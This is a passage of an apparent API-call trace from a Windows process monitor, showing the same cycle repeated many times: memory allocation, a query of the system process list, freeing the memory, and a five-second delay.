ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.798] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.813] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.820] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.828] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.850] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.865] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.929] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.941] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.962] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.987] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 